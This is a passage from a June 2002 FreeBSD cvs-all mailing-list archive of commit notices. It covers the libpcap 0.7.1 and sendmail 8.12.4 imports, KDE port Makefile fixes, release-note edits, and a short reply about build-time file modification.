src/contrib/libpcap/pcap-int.h U src/contrib/libpcap/pcap-linux.c U src/contrib/libpcap/pcap-namedb.h U src/contrib/libpcap/pcap-nit.c U src/contrib/libpcap/pcap-nit.h U src/contrib/libpcap/pcap-null.c U src/contrib/libpcap/pcap-pf.c U src/contrib/libpcap/pcap-pf.h U src/contrib/libpcap/pcap-snit.c U src/contrib/libpcap/pcap-snoop.c C src/contrib/libpcap/pcap.3 U src/contrib/libpcap/pcap.c C src/contrib/libpcap/pcap.h U src/contrib/libpcap/ppp.h U src/contrib/libpcap/savefile.c C src/contrib/libpcap/scanner.l U src/contrib/libpcap/sll.h N src/contrib/libpcap/SUNOS4/nit_if.o.sparc N src/contrib/libpcap/SUNOS4/nit_if.o.sun3 N src/contrib/libpcap/SUNOS4/nit_if.o.sun4c.4.0.3c C src/contrib/libpcap/bpf/net/bpf.h U src/contrib/libpcap/bpf/net/bpf_filter.c U src/contrib/libpcap/lbl/os-osf4.h U src/contrib/libpcap/lbl/os-solaris2.h U src/contrib/libpcap/lbl/os-sunos4.h U src/contrib/libpcap/lbl/os-ultrix4.h N src/contrib/libpcap/packaging/pcap.spec 10 conflicts created by this import. Use the following command to help the merge: cvs checkout -jTCPDUMP_ORG:yesterday -jTCPDUMP_ORG src/contrib/libpcap To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 18:38:20 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DD29A37B40E; Thu, 20 Jun 2002 18:38:14 -0700 (PDT) Received: (from fenner@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L1cEj18922; Thu, 20 Jun 2002 18:38:14 -0700 (PDT) (envelope-from fenner) Message-Id: <200206210138.g5L1cEj18922@freefall.freebsd.org> From: Bill Fenner Date: Thu, 20 Jun 2002 18:38:14 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/libpcap gencode.c gencode.h grammar.y nametoaddr.c pcap-int.h pcap.3 pcap.h scanner.l src/contrib/libpcap/bpf/net bpf.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG fenner 2002/06/20 18:38:14 PDT Modified files: contrib/libpcap gencode.c gencode.h grammar.y nametoaddr.c pcap-int.h pcap.3 pcap.h scanner.l contrib/libpcap/bpf/net bpf.h Log: Merge libpcap 0.7.1 MFC after: 2 weeks Revision Changes Path 1.4 +57 -17 src/contrib/libpcap/bpf/net/bpf.h 1.10 +728 -36 src/contrib/libpcap/gencode.c 1.5 +40 -30 src/contrib/libpcap/gencode.h 1.7 +31 -5 src/contrib/libpcap/grammar.y 1.9 +4 -3 src/contrib/libpcap/nametoaddr.c 1.5 +3 -3 src/contrib/libpcap/pcap-int.h 1.9 +335 -19 src/contrib/libpcap/pcap.3 1.6 +35 -2 src/contrib/libpcap/pcap.h 1.8 +53 -7 src/contrib/libpcap/scanner.l To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 19:11:38 2002 Delivered-To: cvs-all@freebsd.org Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by hub.freebsd.org (Postfix) with ESMTP id 6B32137B412; Thu, 20 Jun 2002 19:11:35 -0700 (PDT) Received: from horsey.gshapiro.net (gshapiro@localhost [IPv6:::1]) by horsey.gshapiro.net (8.12.4/8.12.4) with ESMTP id g5L2BVLW009868 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Thu, 20 Jun 2002 19:11:31 -0700 (PDT) Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.4/8.12.4/Submit) id g5L2BVlx009865; Thu, 20 Jun 2002 19:11:31 -0700 (PDT) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15634.35667.54615.663995@horsey.gshapiro.net> Date: Thu, 20 Jun 2002 19:11:31 -0700 From: Gregory Neil Shapiro To: Garrett Wollman Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/share/examples/etc make.conf src/share/man/man5make.conf.5 In-Reply-To: <200206201844.g5KIislg071819@khavrinen.lcs.mit.edu> References: <200206200433.g5K4X6N80308@freefall.freebsd.org> <3D1194D6.993AB531@FreeBSD.org> <15633.63025.19329.57495@horsey.gshapiro.net> <200206201844.g5KIislg071819@khavrinen.lcs.mit.edu> X-Mailer: VM 7.03 under 21.1 (patch 14) "Cuyahoga Valley" XEmacs Lucid Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG wollman> Rather than adding a warning, how about fixing the bug? No files wollman> outside of the object tree may ever be modified during a build. So much for playing with my new Soekis box tonight. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 19:25:57 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9CD3737B411; Thu, 20 Jun 2002 19:25:45 -0700 (PDT) Received: (from gshapiro@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L2PjK33958; Thu, 20 Jun 2002 19:25:45 -0700 (PDT) (envelope-from gshapiro) Message-Id: <200206210225.g5L2PjK33958@freefall.freebsd.org> From: Gregory Neil Shapiro Date: Thu, 20 Jun 2002 19:25:45 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/sendmail FREEBSD-upgrade INSTALL LICENSE README RELEASE_NOTES src/contrib/sendmail/cf README src/contrib/sendmail/cf/cf submit.cf src/contrib/sendmail/cf/feature dnsbl.m4 enhdnsbl.m4 preserve_luser_host.m4 ... X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG gshapiro 2002/06/20 19:25:45 PDT Modified files: (Branch: RELENG_4) contrib/sendmail FREEBSD-upgrade INSTALL LICENSE README RELEASE_NOTES contrib/sendmail/cf README contrib/sendmail/cf/cf submit.cf contrib/sendmail/cf/feature dnsbl.m4 enhdnsbl.m4 preserve_luser_host.m4 contrib/sendmail/cf/m4 proto.m4 version.m4 contrib/sendmail/contrib dnsblaccess.m4 smcontrol.pl contrib/sendmail/doc/op op.me contrib/sendmail/include/libmilter mfapi.h contrib/sendmail/include/libsmdb smdb.h contrib/sendmail/include/sendmail pathnames.h contrib/sendmail/include/sm conf.h mbdb.h shm.h contrib/sendmail/include/sm/os sm_os_freebsd.h contrib/sendmail/libmilter handler.c libmilter.h listener.c main.c smfi.c contrib/sendmail/libmilter/docs sample.html smfi_addheader.html smfi_chgheader.html contrib/sendmail/libsm mbdb.c mpeix.c t-event.c contrib/sendmail/libsmdb smdb.c smdb1.c smdb2.c smndbm.c contrib/sendmail/libsmutil cf.c safefile.c contrib/sendmail/mail.local mail.local.c contrib/sendmail/mailstats mailstats.8 mailstats.c contrib/sendmail/smrsh smrsh.8 smrsh.c contrib/sendmail/src Makefile.m4 README TRACEFLAGS alias.c bf.c bf.h collect.c conf.c conf.h daemon.c deliver.c domain.c envelope.c mailq.1 main.c map.c mci.c milter.c mime.c queue.c readcf.c recipient.c sasl.c savemail.c sendmail.8 sendmail.h sfsasl.c srvrsmtp.c stats.c usersmtp.c util.c version.c contrib/sendmail/vacation vacation.c Added files: (Branch: RELENG_4) contrib/sendmail/cf/mailer cyrusv2.m4 Log: MFC: sendmail 8.12.4 import Revision Changes Path 1.1.2.10 +64 -5 src/contrib/sendmail/FREEBSD-upgrade 1.1.1.1.2.4 +5 -4 src/contrib/sendmail/INSTALL 1.1.1.2.6.4 +2 -2 src/contrib/sendmail/LICENSE 1.1.1.3.2.4 +49 -1 src/contrib/sendmail/README 1.1.1.3.2.10 +97 -4 src/contrib/sendmail/RELEASE_NOTES 1.1.1.3.2.10 +68 -15 src/contrib/sendmail/cf/README 1.1.1.1.2.3 +6 -5 src/contrib/sendmail/cf/cf/submit.cf 1.1.1.1.2.4 +6 -4 src/contrib/sendmail/cf/feature/dnsbl.m4 1.1.1.1.2.2 +3 -3 src/contrib/sendmail/cf/feature/enhdnsbl.m4 1.1.1.1.2.2 +3 -2 src/contrib/sendmail/cf/feature/preserve_luser_host.m4 1.1.1.4.2.9 +13 -7 src/contrib/sendmail/cf/m4/proto.m4 1.1.1.3.2.10 +2 -2 src/contrib/sendmail/cf/m4/version.m4 1.1.1.1.2.1 +29 -0 src/contrib/sendmail/cf/mailer/cyrusv2.m4 (new) 1.1.1.1.2.2 +5 -5 src/contrib/sendmail/contrib/dnsblaccess.m4 1.1.1.1.6.3 +16 -0 src/contrib/sendmail/contrib/smcontrol.pl 1.1.1.3.2.10 +62 -14 src/contrib/sendmail/doc/op/op.me 1.1.1.1.2.5 +4 -1 src/contrib/sendmail/include/libmilter/mfapi.h 1.1.1.1.2.5 +2 -3 src/contrib/sendmail/include/libsmdb/smdb.h 1.1.1.1.2.5 +2 -2 src/contrib/sendmail/include/sendmail/pathnames.h 1.1.1.1.2.3 +7 -2 src/contrib/sendmail/include/sm/conf.h 1.1.1.1.2.2 +4 -4 src/contrib/sendmail/include/sm/mbdb.h 1.1.1.1.2.4 +1 -1 src/contrib/sendmail/include/sm/os/sm_os_freebsd.h 1.1.1.1.2.2 +3 -4 src/contrib/sendmail/include/sm/shm.h 1.1.1.1.2.2 +371 -307 src/contrib/sendmail/libmilter/docs/sample.html 1.1.1.1.2.2 +23 -2 src/contrib/sendmail/libmilter/docs/smfi_addheader.html 1.1.1.1.2.2 +23 -2 src/contrib/sendmail/libmilter/docs/smfi_chgheader.html 1.1.1.1.2.4 +6 -4 src/contrib/sendmail/libmilter/handler.c 1.1.1.1.2.7 +2 -1 src/contrib/sendmail/libmilter/libmilter.h 1.1.1.1.2.8 +81 -38 src/contrib/sendmail/libmilter/listener.c 1.1.1.1.2.6 +24 -2 src/contrib/sendmail/libmilter/main.c 1.1.1.1.2.4 +2 -1 src/contrib/sendmail/libmilter/smfi.c 1.1.1.1.2.3 +11 -4 src/contrib/sendmail/libsm/mbdb.c 1.1.1.1.2.2 +3 -3 src/contrib/sendmail/libsm/mpeix.c 1.1.1.1.2.3 +1 -1 src/contrib/sendmail/libsm/t-event.c 1.1.1.1.2.5 +9 -9 src/contrib/sendmail/libsmdb/smdb.c 1.1.1.1.2.6 +4 -4 src/contrib/sendmail/libsmdb/smdb1.c 1.1.1.1.2.6 +6 -6 src/contrib/sendmail/libsmdb/smdb2.c 1.1.1.1.2.6 +2 -2 src/contrib/sendmail/libsmdb/smndbm.c 1.1.1.1.2.2 +3 -3 src/contrib/sendmail/libsmutil/cf.c 1.1.1.1.2.5 +15 -7 src/contrib/sendmail/libsmutil/safefile.c 1.6.6.9 +4 -4 src/contrib/sendmail/mail.local/mail.local.c 1.1.1.2.6.6 +8 -3 src/contrib/sendmail/mailstats/mailstats.8 1.5.2.6 +17 -16 src/contrib/sendmail/mailstats/mailstats.c 1.3.6.4 +3 -3 src/contrib/sendmail/smrsh/smrsh.8 1.3.6.7 +29 -15 src/contrib/sendmail/smrsh/smrsh.c 1.1.1.3.2.4 +3 -2 src/contrib/sendmail/src/Makefile.m4 1.1.1.3.2.10 +4 -2 src/contrib/sendmail/src/README 1.1.1.2.6.4 +4 -4 src/contrib/sendmail/src/TRACEFLAGS 1.1.1.2.6.6 +15 -6 src/contrib/sendmail/src/alias.c 1.1.1.1.2.3 +16 -5 src/contrib/sendmail/src/bf.c 1.1.1.1.2.4 +2 -3 src/contrib/sendmail/src/bf.h 1.1.1.4.2.9 +2 -2 src/contrib/sendmail/src/collect.c 1.5.2.9 +56 -5 src/contrib/sendmail/src/conf.c 1.6.2.9 +12 -2 src/contrib/sendmail/src/conf.h 1.1.1.3.2.9 +4 -4 src/contrib/sendmail/src/daemon.c 1.1.1.3.2.9 +16 -10 src/contrib/sendmail/src/deliver.c 1.1.1.3.2.6 +4 -4 src/contrib/sendmail/src/domain.c 1.1.1.3.2.7 +2 -2 src/contrib/sendmail/src/envelope.c 1.3.6.7 +3 -3 src/contrib/sendmail/src/mailq.1 1.1.1.3.2.10 +9 -1 src/contrib/sendmail/src/main.c 1.1.1.3.2.10 +57 -21 src/contrib/sendmail/src/map.c 1.3.6.7 +5 -5 src/contrib/sendmail/src/mci.c 1.1.1.1.2.11 +1 -1 src/contrib/sendmail/src/milter.c 1.1.1.3.2.5 +3 -2 src/contrib/sendmail/src/mime.c 1.1.1.3.2.9 +31 -13 src/contrib/sendmail/src/queue.c 1.1.1.4.2.10 +9 -1 src/contrib/sendmail/src/readcf.c 1.1.1.3.2.6 +6 -6 src/contrib/sendmail/src/recipient.c 1.1.1.1.2.3 +77 -3 src/contrib/sendmail/src/sasl.c 1.4.2.7 +9 -8 src/contrib/sendmail/src/savemail.c 1.3.6.5 +4 -5 src/contrib/sendmail/src/sendmail.8 1.1.1.4.2.10 +30 -12 src/contrib/sendmail/src/sendmail.h 1.1.1.1.2.8 +13 -2 src/contrib/sendmail/src/sfsasl.c 1.1.1.2.6.9 +217 -17 src/contrib/sendmail/src/srvrsmtp.c 1.1.1.2.6.6 +2 -2 src/contrib/sendmail/src/stats.c 1.1.1.3.2.9 +276 -25 src/contrib/sendmail/src/usersmtp.c 1.1.1.3.2.8 +4 -4 src/contrib/sendmail/src/util.c 1.1.1.3.2.10 +2 -2 src/contrib/sendmail/src/version.c 1.1.1.1.2.8 +46 -27 src/contrib/sendmail/vacation/vacation.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 19:49:14 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2A9B737B41D; Thu, 20 Jun 2002 19:48:49 -0700 (PDT) Received: (from alane@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L2mnt37698; Thu, 20 Jun 2002 19:48:49 -0700 (PDT) (envelope-from alane) Message-Id: <200206210248.g5L2mnt37698@freefall.freebsd.org> From: Alan Eldridge Date: Thu, 20 Jun 2002 19:48:48 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/audio/kdemultimedia2 Makefile ports/deskutils/kdepim Makefile ports/devel/kdesdk Makefile ports/games/kdegames2 Makefile ports/graphics/kdegraphics2 Makefile ports/misc/kde2-i18n Makefile ports/misc/kdeaddons Makefile ports/misc/kdeutils2 ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alane 2002/06/20 19:48:48 PDT Modified files: audio/kdemultimedia2 Makefile deskutils/kdepim Makefile devel/kdesdk Makefile games/kdegames2 Makefile graphics/kdegraphics2 Makefile misc/kde2-i18n Makefile misc/kdeaddons Makefile misc/kdeutils2 Makefile net/kdenetwork2 Makefile russian/kde2-i18n Makefile sysutils/kdeadmin Makefile textproc/kdoc Makefile ukrainian/kde-i18n-uk Makefile x11/kdebase2 Makefile x11/kdelibs2 Makefile x11-clocks/kdetoys2 Makefile x11-wm/kdeartwork Makefile Log: Distfiles have been moved on kde site to Attic. PR: ports/39558 Submitted by: glewis Reviewed by: alane Revision Changes Path 1.69 +1 -1 ports/audio/kdemultimedia2/Makefile 1.19 +1 -1 ports/deskutils/kdepim/Makefile 1.16 +1 -1 ports/devel/kdesdk/Makefile 1.64 +1 -1 ports/games/kdegames2/Makefile 1.61 +1 -1 ports/graphics/kdegraphics2/Makefile 1.14 +1 -1 ports/misc/kde2-i18n/Makefile 1.16 +1 -1 ports/misc/kdeaddons/Makefile 1.65 +1 -1 ports/misc/kdeutils2/Makefile 1.76 +1 -1 ports/net/kdenetwork2/Makefile 1.5 +1 -1 ports/russian/kde2-i18n/Makefile 1.15 +1 -1 ports/sysutils/kdeadmin/Makefile 1.7 +1 -1 ports/textproc/kdoc/Makefile 1.4 +1 -1 ports/ukrainian/kde-i18n-uk/Makefile 1.34 +1 -1 ports/x11-clocks/kdetoys2/Makefile 1.11 +1 -1 ports/x11-wm/kdeartwork/Makefile 1.96 +1 -1 ports/x11/kdebase2/Makefile 1.100 +1 -1 ports/x11/kdelibs2/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 19:51:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E87CB37B406; Thu, 20 Jun 2002 19:51:45 -0700 (PDT) Received: (from gshapiro@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L2pjx38912; Thu, 20 Jun 2002 19:51:45 -0700 (PDT) (envelope-from gshapiro) Message-Id: <200206210251.g5L2pjx38912@freefall.freebsd.org> From: Gregory Neil Shapiro Date: Thu, 20 Jun 2002 19:51:45 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/sendmail FREEBSD-upgrade X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG gshapiro 2002/06/20 19:51:45 PDT Modified files: (Branch: RELENG_4) contrib/sendmail FREEBSD-upgrade Log: Fix date for MFC of 8.12.4 Revision Changes Path 1.1.2.11 +2 -2 src/contrib/sendmail/FREEBSD-upgrade To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 19:55:53 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BEBB637B41B; Thu, 20 Jun 2002 19:55:19 -0700 (PDT) Received: (from gshapiro@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L2tJw39281; Thu, 20 Jun 2002 19:55:19 -0700 (PDT) (envelope-from gshapiro) Message-Id: <200206210255.g5L2tJw39281@freefall.freebsd.org> From: Gregory Neil Shapiro Date: Thu, 20 Jun 2002 19:55:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release/doc/en_US.ISO8859-1/relnotes/common new.sgml X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG gshapiro 2002/06/20 19:55:19 PDT Modified files: (Branch: RELENG_4) release/doc/en_US.ISO8859-1/relnotes/common new.sgml Log: Add a release note for the sendmail 8.12.4 MFC. Revision Changes Path 1.22.2.253 +4 -1 src/release/doc/en_US.ISO8859-1/relnotes/common/new.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 20:59:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 629C137B404; Thu, 20 Jun 2002 20:59:47 -0700 (PDT) Received: (from alane@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L3xlP51065; Thu, 20 Jun 2002 20:59:47 -0700 (PDT) (envelope-from alane) Message-Id: <200206210359.g5L3xlP51065@freefall.freebsd.org> From: Alan Eldridge Date: Thu, 20 Jun 2002 20:59:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/misc/kde2-i18n/files patch-zh_CN-messages-ppdtranslations.po patch-zh_TW-messages-kdegraphics-kpixmap2bitmap.po X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alane 2002/06/20 20:59:47 PDT Added files: misc/kde2-i18n/files patch-zh_CN-messages-ppdtranslations.po patch-zh_TW-messages-kdegraphics-kpixmap2bitmap.po Log: Remove dupe .po entries that choke gettext-0.11.x. PR: ports/39559 Submitted by: glewis Reviewed by: alane Revision Changes Path 1.1 +27 -0 ports/misc/kde2-i18n/files/patch-zh_CN-messages-ppdtranslations.po (new) 1.1 +17 -0 ports/misc/kde2-i18n/files/patch-zh_TW-messages-kdegraphics-kpixmap2bitmap.po (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 21: 5:24 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9A70437B407; Thu, 20 Jun 2002 21:05:19 -0700 (PDT) Received: (from alane@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L45Jp54094; Thu, 20 Jun 2002 21:05:19 -0700 (PDT) (envelope-from alane) Message-Id: <200206210405.g5L45Jp54094@freefall.freebsd.org> From: Alan Eldridge Date: Thu, 20 Jun 2002 21:05:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/misc/kde2-i18n Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alane 2002/06/20 21:05:19 PDT Modified files: misc/kde2-i18n Makefile Log: Updated PORTREVISION. Should have done that with last commit. Revision Changes Path 1.15 +1 -1 ports/misc/kde2-i18n/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 21:17:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7EED237B40C; Thu, 20 Jun 2002 21:17:00 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L4H0U57275; Thu, 20 Jun 2002 21:17:00 -0700 (PDT) (envelope-from bmah) Message-Id: <200206210417.g5L4H0U57275@freefall.freebsd.org> From: "Bruce A. Mah" Date: Thu, 20 Jun 2002 21:17:00 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release/doc/en_US.ISO8859-1/relnotes/common new.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/20 21:17:00 PDT Modified files: release/doc/en_US.ISO8859-1/relnotes/common new.sgml Log: New release notes: gifconfig(8) gone, prefix(8) gone. Adjust one other item to match. Revision Changes Path 1.372 +11 -3 src/release/doc/en_US.ISO8859-1/relnotes/common/new.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 21:31:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C00A837B410; Thu, 20 Jun 2002 21:31:11 -0700 (PDT) Received: (from jkoshy@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L4VB259197; Thu, 20 Jun 2002 21:31:11 -0700 (PDT) (envelope-from jkoshy) Message-Id: <200206210431.g5L4VB259197@freefall.freebsd.org> From: Joseph Koshy Date: Thu, 20 Jun 2002 21:31:11 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: www/en/news press.xml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jkoshy 2002/06/20 21:31:11 PDT Modified files: en/news press.xml Log: Jordan Hubbard's interview with Kerneltrap.org. Revision Changes Path 1.55 +17 -1 www/en/news/press.xml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 21:31:40 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E67C037B41D; Thu, 20 Jun 2002 21:31:31 -0700 (PDT) Received: (from alane@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L4VVt59239; Thu, 20 Jun 2002 21:31:31 -0700 (PDT) (envelope-from alane) Message-Id: <200206210431.g5L4VVt59239@freefall.freebsd.org> From: Alan Eldridge Date: Thu, 20 Jun 2002 21:31:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/kdenetwork3 Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alane 2002/06/20 21:31:31 PDT Modified files: net/kdenetwork3 Makefile Log: 1. USE_KDELIBS_VER => USE_KDEBASE_VER: add dep on kdebase3. 2. Bump PORTREVISION because of (1). Revision Changes Path 1.79 +2 -1 ports/net/kdenetwork3/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 21:37:55 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 39F9437B411; Thu, 20 Jun 2002 21:37:50 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L4boY59806; Thu, 20 Jun 2002 21:37:50 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206210437.g5L4boY59806@freefall.freebsd.org> From: Juli Mallett Date: Thu, 20 Jun 2002 21:37:50 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/articles/contributors article.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/20 21:37:50 PDT Modified files: en_US.ISO8859-1/articles/contributors article.sgml Log: Revert revision 1.148 and reinstate revision 1.92, adding Jeroen Ruigrok back to the Development Team Alumni area, this time reflecting that he served in the year 2002 as well. Revision Changes Path 1.209 +7 -0 doc/en_US.ISO8859-1/articles/contributors/article.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 21:40:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6066D37B40F; Thu, 20 Jun 2002 21:40:47 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L4el960021; Thu, 20 Jun 2002 21:40:47 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206210440.g5L4el960021@freefall.freebsd.org> From: Juli Mallett Date: Thu, 20 Jun 2002 21:40:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/articles/contributors article.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/20 21:40:47 PDT Modified files: en_US.ISO8859-1/articles/contributors article.sgml Log: Grr, applying diffs between revisions multiple times to try to get things to apply cleanly ended up doubling Jeroen's entries in the developers list rather than removing. Must remember to view a unified diff just before a commit. Sorry. Revision Changes Path 1.210 +0 -8 doc/en_US.ISO8859-1/articles/contributors/article.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 22: 2: 4 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0F95437B410; Thu, 20 Jun 2002 22:02:02 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L522D62760; Thu, 20 Jun 2002 22:02:02 